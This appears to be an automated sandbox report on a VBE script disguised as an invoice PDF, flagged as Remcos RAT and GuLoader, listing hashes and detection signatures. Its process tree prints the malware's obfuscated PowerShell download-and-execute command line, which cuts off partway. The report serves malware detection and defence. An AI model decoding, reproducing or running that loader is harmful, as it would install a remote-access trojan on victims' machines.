Edit tour
Windows
Analysis Report
Faktura_82666410_1361590461#U00b7pdf.vbe
Overview
General Information
Sample name: | Faktura_82666410_1361590461#U00b7pdf.vberenamed because original name is a hash value |
Original sample name: | Faktura_82666410_1361590461pdf.vbe |
Analysis ID: | 1522517 |
MD5: | f1a0355012d13febdfb56ee8d2b38012 |
SHA1: | 38fb764e45b496b63b7a49713fac2b411cfc524b |
SHA256: | 670cb64bd0bbb0baf70d835715afa71ab16e20b3b409e66a2fd5fedfdb375f2b |
Tags: | vbeuser-abuse_ch |
Infos: | |
Detection
Remcos, GuLoader
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 6472 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\Faktu ra_8266641 0_13615904 61#U00b7pd f.vbe" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 3020 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "<#ubekend t Ninety D rmaatters #>;$Autora diogramme= 'Stivninge rnes84';<# Prolonging Fibromets Verbigera tive #>;$o mphacite=$ host.Priva teData;If ($omphacit e) {$Okole hao++;}fun ction Kolo nnetyperne s($aldis){ $aneurin=$ Drawbeam+$ aldis.Leng th-$Okoleh ao;for( $N onnormalne ss=5;$Nonn ormalness -lt $aneur in;$Nonnor malness+=6 ){$Befolkn ingsgruppe rnes+=$ald is[$Nonnor malness];} $Befolknin gsgruppern es;}functi on Sibs($V enezuelane ren){ & ($ Dkstolens7 0) ($Venez uelaneren) ;}$dyingne ss=Kolonne typernes ' Prom MBeng toTs bazMe jeniPowwol Unc.al ett aaDurst/s, ide5Beskr. Trian0Sejr s Go f(Ant epWOplseiD ueurnProgr dUge aoDor sow BekrsR e ta Opera N UngdT pe st Incit1M ic e0Elect .F den0Ind vi;Semin M odstWVid i iF rfrn os te6L ftt4 Hy,d;Prana Photx Ter m6Udski4Ru id;Han s Ve jurCry, ev Kryd:b. vge1.mbry2 sekst1,ara d.,enry0Ha lmk)Breve PoelsGBe,r aeStoddc K o skRemedo Azte/Pant o2Kroku0Be .be1 orle0 Overg0foll .1Fjert0Ub rug1 Unba grsenF ace ti Overr o naeAlgerfS ub,noSlagk xAban /Ind ia1Nglep2P reob1Fulge .,etai0Sta ff ';$Orig inalfabrik ken=Kolonn etypernes 'Ful ku ng ueSboligeT hickrSyna -SakraaSt, aagParage rapnIndskT No,pa ';$A phagia=Kol onnetypern es 'kara,h Tvelytvari ct IdeapVa usys Gui : Lunch/Gran s/Kitchd , agnr Perii G ngbvStop heFluor.A ecdgTariro Slu oOxal ig Formlty phle Ho t. DanscOrga no elvbmHi pli/Ev ntu Humanc unb l?KondeeKn trexMargup interoGenr erLinjetJu dge=Dividd ObtruoProt wFj rdnNe dsal Truso SpildaPal idJogge&F erniStrafd Prees=s.wb w1Tenni2 T ,lblCoa,jz FogedUTi,s yxExiteLL itnYAregey Stj rsS ut anNightAA rikH Outsg Plade1 stv l2 katunit r ORu.otMS pineX owsn bTotal7Bug huut ngsES ang y Misg O .amdaK e diJTotalCT angaA Ovnt NUnhorHPen geHAlkal ' ;$melaena= Kolonnetyp ernes ' ra l> .epo ' ;$Dkstolen s70=Kolonn etypernes 'MarguI Sh ineUndelXA toni ';$Pa ddehat='Cu lturises'; $Helbredsu ndersoegel se='\Kanal separation en.Gte';Si bs (Kolonn etypernes ' pee$ Aga mg LagrlH. drooR ccyb LgenpaSper mlAquaf:St atiT elevo TubatrHybr is tieriYd .rlo Brenn AktivsLydr easan efUn obsf Drjej .ombaeRect d skolrtr ffei Ti.gn .angegSml re Guddn,r ssa= Band$ S.reeA,pa rnMicasvBi f.n:Baunga Shi,lpH pl opSongld T ricaSlagbt eanaAstro +Carpi$Mel l,HSo taeS qui l Fors bKla rr yl evePraecdJ akiesDjvle uSennenFic indProtoeI nsa rPrim, sS ldeoDeg reeWleccg UdpieAi,bi lind ssLit tleSnobs ' );Sibs (Ko lonnetyper nes 'Beska $Subspg Eg oil rochoE k,tebAssor a .ortlPin t :A droKg idserRe ev aSymphmTel efmMic.oe PyronVaret dL bane Fl de=H nga$J ell ADemur pLogichT e era InergS ttteiSpiri aPolys..nt agsheedhpA rvealTr bo iHjesttBe nd(Addit$M uthmomkla eFintelAgi